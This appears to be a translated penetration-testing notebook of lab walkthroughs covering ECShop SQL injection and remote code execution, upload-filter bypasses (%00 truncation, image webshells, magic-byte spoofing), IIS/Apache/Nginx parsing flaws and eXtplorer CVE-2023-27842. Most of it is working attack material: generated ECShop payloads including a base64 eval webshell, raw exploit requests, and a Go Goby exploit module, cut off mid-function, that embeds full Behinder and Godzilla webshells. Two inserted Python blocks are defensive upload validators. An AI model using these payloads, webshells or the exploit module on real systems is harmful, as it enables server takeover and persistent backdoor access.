cd vulhub-master/ecshop/xianzhi-2017-02-82239600
sudo docker-compose up -d

After running the commands:

Ecshop 2.x:
open http://ip:8080 in a browser; if it loads normally the range is up.

Ecshop 3.x:
open http://ip:8081 in a browser; if it loads normally the range is up.

Then run the installer for each; the database host is mysql and the username and password are both root.

Finding the vulnerability
Root cause
  • The Referer value is not validated at all and can be controlled and used directly.
  • _echash is used as the separator and is a fixed value: 2.x: 554fcae493e564ee0dc75bdf2ebf94ca, 3.x: 45ea207d7a2b68c49582d2d22adf953a.
  • Careless SQL string concatenation in the insert_ads function leads to SQL injection.
  • The make_val function concatenates user input into the string.
These four steps together lead to remote code execution; see the referenced article for a detailed analysis.

Exploitation
By hand
Knowing the principle, we start exploiting the vulnerability. The environment is as follows:

Target: 192.168.75.146

Attacker: 192.168.75.144

First prepare the POC; the code is as follows:

sprintf('*/SELECT 1,0x%s,2,4,5,6,7,8,0x%s,10-- -', bin2hex($id), $shell), "id" => $id ]; $s = serialize($arr); $hash3 = '45ea207d7a2b68c49582d2d22adf953a'; $hash2 = '554fcae493e564ee0dc75bdf2ebf94ca'; echo "POC for ECShop 2.x: \n"; echo "{$hash2}ads|{$s}{$hash2}"; echo "\n\nPOC for ECShop 3.x: \n"; echo "{$hash3}ads|{$s}{$hash3}"; ?>

Run the code above with php to generate the POC:

POC for ECShop 2.x:
554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca

POC for ECShop 3.x:
45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953a
Ecshop 2.x POC usage:
In Burp, capture the Ecshop user login page, send it to Repeater, then replace the request with the POC below:

GET /user.php HTTP/1.1
Host: [target IP]
Referer: [generated POC]
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 1

After sending it you get the following result, which proves the exploit succeeded.

Ecshop 3.x POC usage:
In Burp, capture the Ecshop user login page, send it to Repeater, then replace the request with the POC below:

GET /user.php HTTP/1.1
Host: [target IP]
Referer: [generated POC]
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 1

After sending it you get the following result, which proves the exploit succeeded.

Get WebShell
Generate the POC that obtains a webshell; the code is as follows:

sprintf('*/SELECT 1,0x%s,2,4,5,6,7,8,0x%s,10-- -', bin2hex($id), $shell), "id" => $id ]; $s = serialize($arr); $hash3 = '45ea207d7a2b68c49582d2d22adf953a'; $hash2 = '554fcae493e564ee0dc75bdf2ebf94ca'; echo "POC for ECShop 2.x: \n"; echo "{$hash2}ads|{$s}{$hash2}"; echo "\n\nPOC for ECShop 3.x: \n"; echo "{$hash3}ads|{$s}{$hash3}"; ?>

// original

file_put_contents('eval.php','<?php eval($_POST[cmd]); ?>')

// base64-encoded

ZmlsZV9wdXR0Y29udGVudHMoJ2V2YWwucGhwJywnPD9waHAgZXZhbCgkX1BPU1RbY21kXSk7ID8+Jyk=

The generated Get WebShell POC is as follows:

POC for ECShop 2.x:
554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:297:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a32563259577775634768774a79776e50443977614841675a585a686243676b58314250553152625932316b58536b374944382b4a796b3d2729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca

POC for ECShop 3.x:
45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:297:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a32563259577775634768774a79776e50443977614841675a585a686243676b58314250553152625932316b58536b374944382b4a796b3d2729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953a

Plug the POC into the request as before, then connect with AntSword (蚁剑); the connection screenshot is below:

This concludes the Ecshop xianzhi-2017-02-82239600 SQL injection and remote code execution vulnerability.

ECShop 4.x collection_list SQL injection
Affected range
Ecshop 2.x

Ecshop 3.x-3.6.0

Root cause
See: https://mp.weixin.qq.com/s/xHioArEpoAqGlHJPfq3Jiw

Exploitation
Environment
Name | IP
Attacker | 192.168.159.132
Target | 192.168.159.129
Enter the vulhub directory on the target and start the range with:

cd ecshop/collection_list-sqli
docker-compose up -d

Open http://192.168.159.129:8080; the installer appears, as shown below:

During installation the database host is mysql and the username and password are both root.

The vulnerability
First register a test user test, log in, then click "My favourites"; the captured request is shown below:

By hand
POC:

X-Forwarded-Host: 45ea207d7a2b68c49582d2d22adf953auser_account|a:2:{s:7:"user_id";s:38:"0'-(updatexml(1,repeat(user(),2),1))-'";s:7:"payment";s:1:"4";}|45ea207d7a2b68c49582d2d22adf953a

X-Forwarded-Host: 45ea207d7a2b68c49582d2d22adf953apay_log|s:44:"1' and updatexml(1,repeat(user(),2),1) and '";|

The result is shown below:

Null-byte (%00) truncation

Reference: https://blog.csdn.net/weixin_44840696/article/details/90581104

Reference: https://blog.csdn.net/qq_26090065/article/details/81458937

How null-byte truncation works

Null-byte truncation is an operating-system-level issue. Operating systems are written in C or assembly, and both languages terminate strings with \0 (0x00).

0x00 is the character with ASCII value 0; ASCII reserves 0 as a special character meaning end of string.

Why does null-byte truncation work?

%00 is the URL-encoded form of the character with ASCII value 0, and 0x00 is the string terminator. To understand %00 we first need to understand 0x00: it is hexadecimal notation for ASCII value 0 (the 0x prefix means hexadecimal, and 0 is 00 in hex), so %00 decodes to 0x00.

In a URL, %00 stands for ASCII 0, which ASCII reserves as the end-of-string marker; so when %00 appears in a URL, the reader treats the string as ending there.

Requirements

  • The PHP version must be below 5.3.4; 5.3.4 and later fixed the issue
  • magic_quotes_gpc must be OFF

GET request

upload-labs level 12

Look at the source code.

Line 8 (the $img_path assignment) reads our parameter with $_GET['save_path'] and appends "/".rand(10, 99).date("YmdHis").".".$file_ext, i.e. a timestamp and the file extension.

Line 10 (the move_uploaded_file call) saves the file directly to the path built on line 8.

So we can use %00 truncation to cut off the trailing "/".rand(10, 99).date("YmdHis").".".$file_ext.

For example:

if we upload a.php%00.png, the stored name becomes a.php

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
    if(in_array($file_ext,$ext_arr)){
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;

        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = '上传出错!';
        }
    } else{
        $msg = "只允许上传.jpg|.png|.gif类型文件!";
    }
}

Upload a file phpinfo.png with the content:

<?php phpinfo(); ?>

In the captured request, append a.php%00 to the path.

Result:

POST request

upload-labs level 13

In a GET request %00 is decoded automatically.

In a POST body it is not, and since my Burp's URL decoding was misbehaving, we can edit the hex directly instead.

The code is the same as level 12, except that one uses a GET request and the other a POST request.

Line 8 (the $img_path assignment) reads our parameter with $_POST['save_path'] and appends "/".rand(10, 99).date("YmdHis").".".$file_ext, i.e. a timestamp and the file extension.

Line 10 (the move_uploaded_file call) saves the file directly to the path built on line 8.

So we can use %00 truncation to cut off the trailing "/".rand(10, 99).date("YmdHis").".".$file_ext.

For example:

if we upload a.php%00.png, the stored name becomes a.php

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
    if(in_array($file_ext,$ext_arr)){
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = $_POST['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;

        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = "上传失败";
        }
    } else {
        $msg = "只允许上传.jpg|.png|.gif类型文件!";
    }
}

Upload a file phpinfo.png with the content:

<?php phpinfo(); ?>

In the captured request, append a.php= to the path; I add the = so that it is easy to find when editing the hex.

Result:

Image webshell

Bypass by merging an image with a webshell

This copies the webshell into the image. One problem: when the server parses the image, the image's own bytes may interfere with the webshell running.

The copy command

Prepare a file named phpinfo.php

with the content:

<?php echo phpinfo();?>

and an ordinary image named zm9kpy.jpg

Command: copy /a zm9kpy.jpg + /b phpinfo.php = a.jpg

  • /a opens the file in ASCII mode

  • /b opens the file in binary mode

Do not get the order of the files wrong, otherwise the webshell code is inserted at the very front.

You can see that a file a.jpg has been generated.

Some edited images can no longer be viewed.

The tutorial writes it like this, which is not easy to follow.

The image still opens.

View the image file's source code;

you can see the code has been inserted.

File magic-header bypass

Files of the same image type share the same leading bytes; the hex values below were taken from a blog post: https://blog.csdn.net/Kevinhanser/article/details/81613003

```text
jpg=FF D8 FF E0 00 10 4A 46 49 46
gif=47 49 46 38 39 61
png = 89 50 4E 47
```

I captured a JPG upload in Burp and looked at the hex header; it matches.

Bypass by modifying the request body

Some filters check the file content: every image begins with a field like this that identifies its type. Capture the upload of an ordinary image and you can see the string PNG near the start.

upload-labs levels 14 and 15

Both can be bypassed with the following method.

Upload a phpinfo.php file with this content:

```php
<?php
echo phpinfo();
?>
```

If, while uploading, you intercept with Burp and change only the filename and Content-Type to PNG, the upload is still rejected.

So instead upload a PNG file and replace its whole content with the webshell, keeping only the image header bytes.

Upload an ordinary image file, intercept it with Burp, then replace the body with the webshell, leaving only the image header.

Forward the request and the upload succeeds.

But the file cannot be executed because it is a .png; execution needs another vulnerability, such as a parsing vulnerability.
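The header-only check that labs 14 and 15 perform, and that the copy /b image webshell above also passes, is compared here with a stricter check. This is an added example written in Python; it is not code from upload-labs or from the blog post cited above, and the sample files (a minimal PNG, a header-only webshell, a JPEG polyglot) are constructed inline.

```python
import re
import struct
import zlib

# Magic bytes as listed in the section above (JFIF, GIF89a, PNG).
MAGIC = {
    "jpg": bytes.fromhex("FFD8FFE000104A464946"),
    "gif": b"GIF89a",
    "png": bytes.fromhex("89504E47"),
}

# Script openers that have no business inside a file served as an image.
SCRIPT_MARKERS = re.compile(rb"<\?php|<\?=|<%|<script\b", re.IGNORECASE)


def header_only_check(data: bytes, ext: str) -> bool:
    """The weak check: compares only the leading bytes, as labs 14/15 do."""
    magic = MAGIC[ext]
    return data[: len(magic)] == magic


def png_structure_ok(data: bytes) -> bool:
    """Walk the PNG chunk list: 8-byte signature, then length/type/data/CRC
    chunks ending exactly at IEND. A magic header followed by PHP text
    fails here long before any CRC would be checked."""
    sig = b"\x89PNG\r\n\x1a\n"
    if not data.startswith(sig):
        return False
    pos = len(sig)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        if not ctype.isalpha():
            return False
        pos += 8 + length + 4  # chunk header + payload + CRC
        if ctype == b"IEND":
            return pos == len(data)
    return False


def strict_image_check(data: bytes, ext: str) -> tuple:
    """Header check, then container structure, then a scan for script markers."""
    if not header_only_check(data, ext):
        return False, "magic bytes do not match extension"
    if ext == "png" and not png_structure_ok(data):
        return False, "PNG chunk structure is invalid"
    if SCRIPT_MARKERS.search(data):
        return False, "script marker found in image body"
    return True, "ok"


# --- constructed sample files (not captured from any real server) ---
def _png_chunk(ctype: bytes, payload: bytes) -> bytes:
    crc = zlib.crc32(ctype + payload).to_bytes(4, "big")
    return struct.pack(">I", len(payload)) + ctype + payload + crc


# A structurally valid 1x1 PNG: signature, IHDR, IEND (no pixel data is needed for the walk).
GOOD_PNG = (b"\x89PNG\r\n\x1a\n"
            + _png_chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0))
            + _png_chunk(b"IEND", b""))
# Labs 14/15 bypass: the PNG magic bytes, then the webshell instead of image data.
HEADER_ONLY_SHELL = MAGIC["png"] + b"\n<?php echo phpinfo(); ?>"
# copy /b style polyglot: a JPEG header, a few bytes, the end-of-image marker, then PHP appended.
POLYGLOT_JPG = (MAGIC["jpg"] + b"\x00\x01\x01\x00\x48\x00\x48\x00\x00"
                + b"\xff\xd9" + b"<?php echo phpinfo();?>")
```

Both bypasses pass header_only_check and fail strict_image_check for different reasons, which is why the content check has to look past the first few bytes.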

IIS 6.0 parsing vulnerability

Environment: Windows 2003, IIS 6.0

IIS 6.0 parsing can be exploited in two ways:

  • Directory parsing
  • File parsing

Directory parsing

If a directory is named *.asp, IIS 6.0 treats every file inside it as ASP.

Demo

In the web root I create a directory a.asp containing a file abc.png.

Content of abc.png:

```asp
<%response.write("Hello World!")%>
```

Result:

File parsing

For a file named a.asp;.png, the server discards everything after the semicolon.

Demo

Create a file a.asp;.png in the web root and access it.

Apache parsing vulnerabilities

Parsing vulnerability in older Apache versions

Apache reads the extensions in a filename from right to left; if it does not recognise one, it keeps moving left until it finds a type it knows.

For example, abc.php.aaaa.qqqq:

Apache does not recognise .qqqq, moves to .aaaa, which it also does not recognise, then reaches .php, which it does, so the file is finally handled as PHP.

Demo: upload a file named a.php.qqq.

Apache HTTPD newline parsing vulnerability: analysis and

Vulnerability ID: CVE-2017-15715

Apache 2.4.0 through 2.4.29 has a parsing flaw: when handling PHP, a filename that ends with a newline (0x0A) is still parsed as PHP, while the trailing newline lets the upload get past an extension blacklist.

Demo: in the vulhub lab environment, enter /httpd/CVE-2017-15715.

Nginx parsing vulnerabilities

Parsing vulnerability in older versions

I do not know up to which version this vulnerability exists.

The cause: when Nginx gets the path (more precisely, the URI) /test.jpg/test.php, it sees the .php suffix, decides the file is PHP and hands it to PHP. PHP finds that /test.jpg/test.php does not exist, drops the trailing /test.php, sees that /test.jpg exists and takes it as the file to execute; and because its suffix is .jpg, PHP decides this is not a PHP file.

Nginx filename logic vulnerability (CVE-2013-4547)

Affected versions: Nginx 0.8.41 to 1.4.3 and 1.5.0 to 1.5.7, a fairly wide range.

Write-up: https://vulhub.org/#/environments/nginx/CVE-2013-4547/

Enter /vulhub/nginx/CVE-2013-4547 and start the lab environment: docker-compose up -d

[0x20] is a space and [0x00] is \0; neither character needs to be URL-encoded.

```text
uploadfiles/1.gif[0x20][0x00].php
```

Then edit the bytes in the hex view.
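Every trick from upload-labs 12/13 onwards (NUL truncation, the IIS 6.0 semicolon, Apache's right-to-left extensions and trailing newline, Nginx's space-plus-NUL) abuses a filename or path the client chose. This added Python example, not code from upload-labs, vulhub or any of the servers discussed, shows the filename handling that closes all of them at once; UPLOAD_DIR is an assumed server-side location.

```python
import posixpath
import re
import secrets

ALLOWED_EXT = {"jpg", "png", "gif"}
# Extensions a web server might execute wherever they appear in the name.
EXECUTABLE_EXT = {"php", "php3", "php5", "phtml", "asp", "aspx", "asa", "cer", "jsp"}
UPLOAD_DIR = "/var/www/uploads"  # assumed server-side location; never taken from the request


class RejectedUpload(ValueError):
    pass


def validate_client_name(name: str) -> str:
    """Return the single permitted extension of a client-supplied filename, or raise.

    Rejects, in order, the shapes shown in the sections above:
    - 'a.php%00.png' / 'a.php\\x00.png'  (labs 12/13 NUL truncation, Nginx CVE-2013-4547)
    - 'a.php\\n'                         (Apache CVE-2017-15715 trailing newline)
    - 'a.asp;.png'                       (IIS 6.0 semicolon truncation)
    - 'a.php.qqq'                        (Apache right-to-left multi-extension)
    """
    if "%00" in name:
        raise RejectedUpload("URL-encoded NUL in filename")
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in name):
        raise RejectedUpload("control character in filename")
    if re.search(r"[;/\\ ]", name):
        raise RejectedUpload("separator, ';' or space in filename")
    parts = name.lower().split(".")
    if len(parts) < 2 or "" in parts:
        raise RejectedUpload("missing or empty name/extension component")
    exts = parts[1:]  # every extension, not just the text after the last dot
    if any(e in EXECUTABLE_EXT for e in exts):
        raise RejectedUpload("executable extension present: " + name)
    if exts[-1] not in ALLOWED_EXT:
        raise RejectedUpload("extension not allowed: " + exts[-1])
    return exts[-1]


def is_rejected(name: str) -> bool:
    """Convenience wrapper for tests and log review."""
    try:
        validate_client_name(name)
    except RejectedUpload:
        return True
    return False


def server_side_path(client_name: str, client_save_path: str = "") -> str:
    """Build the storage path the way the vulnerable handler should have.

    client_save_path is accepted only to make the point that it is ignored:
    the directory and the base name are chosen by the server, and the only
    client influence left is the validated extension."""
    ext = validate_client_name(client_name)
    path = posixpath.join(UPLOAD_DIR, secrets.token_hex(8) + "." + ext)
    # Belt and braces: the normalised path must still live under UPLOAD_DIR.
    if posixpath.commonpath([UPLOAD_DIR, posixpath.normpath(path)]) != UPLOAD_DIR:
        raise RejectedUpload("path escapes the upload directory")
    return path
```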

eXtplorer file upload vulnerability (CVE-2023-27842)

Environment setup

Download: https://extplorer.net/projects/extplorer/files

I downloaded version 2.1.7.

Unzip it into the web directory.

Start the web service; the PHP version used here is 5.x.

Reproduction

Login request

Default user admin, password admin.

```http
POST /index.php HTTP/1.1
Host: 192.168.56.102
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 102
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip, deflate
Connection: close

option=com_extplorer&action=login&type=extplorer&username=admin&password=admin&lang=simplified_chinese
```

The following response indicates a successful login.

After logging in, browse to the root directory.

Then upload the webshell.

```http
POST /index.php HTTP/1.1
Host: 192.168.56.102
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 755
Content-Type: multipart/form-data; boundary=---------------------------374852334929431586552418693308
Cookie: eXtplorer=hjmvhlcbbkfh1fitjuqdgjpt72;
Accept-Encoding: gzip, deflate
Connection: close

-----------------------------374852334929431586552418693308
Content-Disposition: form-data; name="userfile[0]"; filename="7Ddec6.php"

<?php @error_reporting(0);echo "1f0A14BBbF";unlink(__FILE__);?>
-----------------------------374852334929431586552418693308
Content-Disposition: form-data; name="option"

com_extplorer
-----------------------------374852334929431586552418693308
Content-Disposition: form-data; name="action"

upload
-----------------------------374852334929431586552418693308
Content-Disposition: form-data; name="requestType"

xmlhttprequest
-----------------------------374852334929431586552418693308
Content-Disposition: form-data; name="confirm"

true
-----------------------------374852334929431586552418693308--
```

The upload succeeds.

Then access the uploaded PHP file; it is there.

Note

Newer versions include an upload token.

The token can be obtained from here:

```http
GET /index.php?option=com_extplorer&action=include_javascript&file=functions.js HTTP/1.1
Host: 192.168.56.102
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Cookie: eXtplorer=3pmjltuodtfr748derg2k7g59k;
Accept-Encoding: gzip, deflate
Connection: close
```

Complete Go code

package exploits

import (
"git.gobies.org/goby/goscanner/goutils"
"git.gobies.org/goby/goscanner/jsonvul"
"git.gobies.org/goby/goscanner/scanconfig"
"git.gobies.org/goby/httpclient"
"regexp"
"strings"
)

func init() {
expJson := `{
"Name": "extplorer 平台 index.php 文件上传漏洞(CVE-2023-27842)",
"Description": "<p>eXtplorer是一款基于php应用的文件管理器,通过web页面进行操作,对文件和目录进行编辑、复制、移动和删除等操作,甚至还能修改文件的权限属性。</p><p>攻击者可以利用默认用户admin默认密码admin,后台文件上传漏洞执行恶意代码、写入后门、读取敏感文件,从而可能导致服务器受到攻击并被控制。</p>",
"Product": "eXtplorer",
"Homepage": "http://extplorer.net/",
"DisclosureDate": "2023-03-05",
"Author": "sunying",
"FofaQuery": "app=\"eXtplorer\"",
"GobyQuery": "app=\"eXtplorer\"",
"Level": "2",
"Impact": "<p>攻击者可以利用默认用户admin默认密码admin,后台文件上传漏洞执行恶意代码、写入后门、读取敏感文件,从而可能导致服务器受到攻击并被控制。<br></p>",
"Recommendation": "<p>1、修改默认口令,密码最好包含大小写字母、数字和特殊字符等,且位数大于8位。<br></p><p>2、如非必要,禁止公网访问该系统。<br></p><p>3、通过防火墙等安全设备设置访问策略,设置白名单访问。<br></p>",
"References": [
"https://github.com/tristao-marinho/CVE-2023-27842"
],
"Is0day": false,
"HasExp": true,
"ExpParams": [
{
"name": "attackType",
"type": "select",
"value": "behinder,godzilla,custom",
"show": ""
},
{
"name": "content",
"type": "input",
"value": "<?php echo \"Hello, world!\"; ?>",
"show": "attackType=custom"
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/",
"follow_redirect": false,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": []
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/",
"follow_redirect": false,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": []
},
"SetVariable": []
}
],
"Tags": [
"文件上传"
],
"VulType": [
"文件上传"
],
"CVEIDs": [
"CVE-2023-27842"
],
"CNNVD": [
"CNNVD-202303-1623"
],
"CNVD": [
""
],
"CVSSScore": "8.5",
"Translation": {
"CN": {
"Name": "extplorer 平台 index.php 文件上传漏洞(CVE-2023-27842)",
"Product": "eXtplorer",
"Description": "<p>eXtplorer是一款基于php应用的文件管理器,通过web页面进行操作,对文件和目录进行编辑、复制、移动和删除等操作,甚至还能修改文件的权限属性。</p><p>攻击者可以利用默认用户admin默认密码admin,后台文件上传漏洞执行恶意代码、写入后门、读取敏感文件,从而可能导致服务器受到攻击并被控制。</p>",
"Recommendation": "<p>1、修改默认口令,密码最好包含大小写字母、数字和特殊字符等,且位数大于8位。<br></p><p>2、如非必要,禁止公网访问该系统。<br></p><p>3、通过防火墙等安全设备设置访问策略,设置白名单访问。<br></p>",
"Impact": "<p>攻击者可以利用默认用户admin默认密码admin,后台文件上传漏洞执行恶意代码、写入后门、读取敏感文件,从而可能导致服务器受到攻击并被控制。<br></p>",
"VulType": [
"文件上传"
],
"Tags": [
"文件上传"
]
},
"EN": {
"Name": "extplorer index.php File Upload Vulnerability(CVE-2023-27842)",
"Product": "eXtplorer",
"Description": "<p>EXtplorer is a file manager based on PHP applications, which operates through web pages to edit, copy, move, delete files and directories, and even modify file permission properties.</p><p>Attackers can exploit the default user admin, default password admin, and backend file upload vulnerabilities to execute malicious code, write backdoors, and read sensitive files, which may lead to server attacks and control.</p>",
"Recommendation": "<p>1. Change the default password, which should preferably include uppercase and lowercase letters, numbers, and special characters, with more than 8 digits.</p><p>2. If not necessary, prohibit public network access to the system.</p><p>3. Set access policies and whitelist access through security devices such as firewalls.</p>",
"Impact": "<p>Attackers can exploit the default user admin, default password admin, and backend file upload vulnerabilities to execute malicious code, write backdoors, and read sensitive files, which may lead to server attacks and control.<br></p>",
"VulType": [
"File Upload"
],
"Tags": [
"File Upload"
]
}
},
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}`
obtainUploadTokenda312sdasda := func(hostInfo *httpclient.FixUrl, cookie string) (*httpclient.HttpResponse, error) {
sendConfig := httpclient.NewGetRequestConfig("/index.php?option=com_extplorer&action=include_javascript&file=functions.js")
sendConfig.VerifyTls = false
sendConfig.FollowRedirect = false
sendConfig.Header.Store("Cookie", cookie)
return httpclient.DoHttpRequest(hostInfo, sendConfig)
}

uploadVerificationdsad321321asd := func(hostInfo *httpclient.FixUrl, route string, content string) (*httpclient.HttpResponse, error) {
sendConfig := httpclient.NewGetRequestConfig("/" + route)
sendConfig.VerifyTls = false
sendConfig.FollowRedirect = false
return httpclient.DoHttpRequest(hostInfo, sendConfig)
}
uploadFilesdsad31290as := func(hostInfo *httpclient.FixUrl, route string, content string, cookie string, token string) (*httpclient.HttpResponse, error) {
sendConfig := httpclient.NewPostRequestConfig("/index.php")
sendConfig.VerifyTls = false
sendConfig.FollowRedirect = false
sendConfig.Header.Store("Cookie", cookie)
sendConfig.Header.Store("Content-Type", "multipart/form-data; boundary=---------------------------106849294727430498781818238545")
sendConfig.Data += "-----------------------------106849294727430498781818238545\r\nContent-Disposition: form-data; name=\"userfile[0]\"; filename=\"" + route + "\"\r\nContent-Type: application/x-php\r\n\r\n" + content + "\r\n-----------------------------106849294727430498781818238545\r\nContent-Disposition: form-data; name=\"overwrite_files\"\r\n\r\non\r\n-----------------------------106849294727430498781818238545\r\nContent-Disposition: form-data; name=\"option\"\r\n\r\ncom_extplorer\r\n-----------------------------106849294727430498781818238545\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nupload\r\n-----------------------------106849294727430498781818238545\r\nContent-Disposition: form-data; name=\"dir\"\r\n\r\n/\r\n-----------------------------106849294727430498781818238545\r\nContent-Disposition: form-data; name=\"requestType\"\r\n\r\nxmlhttprequest\r\n-----------------------------106849294727430498781818238545\r\nContent-Disposition: form-data; name=\"confirm\"\r\n\r\ntrue\r\n-----------------------------106849294727430498781818238545\r\nContent-Disposition: form-data; name=\"token\"\r\n\r\n" + token + "\r\n-----------------------------106849294727430498781818238545--\r\n"
return httpclient.DoHttpRequest(hostInfo, sendConfig)
}
validateLogon3das213 := func(hostInfo *httpclient.FixUrl) (*httpclient.HttpResponse, error) {
sendConfig := httpclient.NewPostRequestConfig("/index.php")
sendConfig.VerifyTls = false
sendConfig.FollowRedirect = false
sendConfig.Header.Store("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8")
sendConfig.Header.Store("X-Requested-With", "XMLHttpRequest")
sendConfig.Data = "option=com_extplorer&action=login&type=extplorer&username=admin&password=admin&lang=simplified_chinese"
return httpclient.DoHttpRequest(hostInfo, sendConfig)
}
ExpManager.AddExploit(NewExploit(
goutils.GetFileName(),
expJson,
func(exp *jsonvul.JsonVul, hostinfo *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool {
fileName := goutils.RandomHexString(10) + ".php"
content := goutils.RandomHexString(10)
if successfullyVerifiedLogin, err := validateLogon3das213(hostinfo); err == nil && successfullyVerifiedLogin.StatusCode == 200 && strings.Contains(successfullyVerifiedLogin.RawBody, "'success':true") {
if uploadToken, err := obtainUploadTokenda312sdasda(hostinfo, successfullyVerifiedLogin.Cookie); err == nil {
Token := regexp.MustCompile(`token:\s*"([^"]+)"`).FindStringSubmatch(uploadToken.Utf8Html)
if len(Token) < 2 {
Token = []string{"", goutils.RandomHexString(32)}
}
fileUpload, err := uploadFilesdsad31290as(hostinfo, fileName, "<?php @error_reporting(0);echo \""+content+"\";unlink(__FILE__);?>", successfullyVerifiedLogin.Cookie, Token[1])
if err == nil && strings.Contains(fileUpload.RawBody, "'success':true") {
uploadResults, err := uploadVerificationdsad321321asd(hostinfo, fileName, content)
return err == nil && strings.Contains(uploadResults.RawBody, content)
}
}

}
return false
},
func(expResult *jsonvul.ExploitResult, stepLogs *scanconfig.SingleScanConfig) *jsonvul.ExploitResult {
attackType := goutils.B2S(stepLogs.Params["attackType"])
var content string
if attackType == "behinder" {
// The key is the first 16 characters of the 32-character MD5 of the connection password; the default connection password is rebeyond
content = `<?php @error_reporting(0);session_start();$key="e45e329feb5d925b";$_SESSION['k']=$key;session_write_close();$post=file_get_contents("php://input");if(!extension_loaded('openssl')){$t="base64_"."decode";$post=$t($post."");for($i=0;$i<strlen($post);$i++){$post[$i]=$post[$i]^$key[$i+1&15];}}else{$post=openssl_decrypt($post,"AES128",$key);}$arr=explode('|',$post);$func=$arr[0];$params=$arr[1];class C{public function __invoke($p){eval($p."");}}@call_user_func(new C(),$params);echo "e165421110ba03099a1c0393373c5b43";?>`
} else if attackType == "godzilla" {
// Godzilla: pass / key
content = `<?php @session_start();@set_time_limit(0);@error_reporting(0);function encode($D,$K){for($i=0;$i<strlen($D);$i++){$c=$K[$i+1&15];$D[$i]=$D[$i]^$c;}return $D;}$pass='pass';$payloadName='payload';$key='3c6e0b8a9c15224a';if(isset($_POST[$pass])){$data=encode(base64_decode($_POST[$pass]),$key);if(isset($_SESSION[$payloadName])){$payload=encode($_SESSION[$payloadName],$key);if(strpos($payload,"getBasicsInfo")===false){$payload=encode($payload,$key);}eval($payload);echo substr(md5($pass.$key),0,16);echo base64_encode(encode(@run($data),$key));echo substr(md5($pass.$key),16);}else{if(strpos($data,"getBasicsInfo")!==false){$_SESSION[$payloadName]=encode($data,$key);}}}echo "e165421110ba03099a1c0393373c5b43";?>`
} else if attackType == "custom" {
content = goutils.B2S(stepLogs.Params["content"])
} else {
expResult.Output = `未知的利用方式`
return expResult
}
successfullyVerifiedLogin, err := validateLogon3das213(expResult.HostInfo)
if err != nil {
expResult.Output = err.Error()
} else if successfullyVerifiedLogin.StatusCode == 200 && strings.Contains(successfullyVerifiedLogin.RawBody, "'success':true") {
fileName := goutils.RandomHexString(10) + ".php"
uploadToken, err := obtainUploadTokenda312sdasda(expResult.HostInfo, successfullyVerifiedLogin.Cookie)
if err != nil {
expResult.Output = err.Error()
return expResult
}
Token := regexp.MustCompile(`token:\s*"([^"]+)"`).FindStringSubmatch(uploadToken.Utf8Html)
if len(Token) < 2 {
Token = []string{"", goutils.RandomHexString(32)}
}
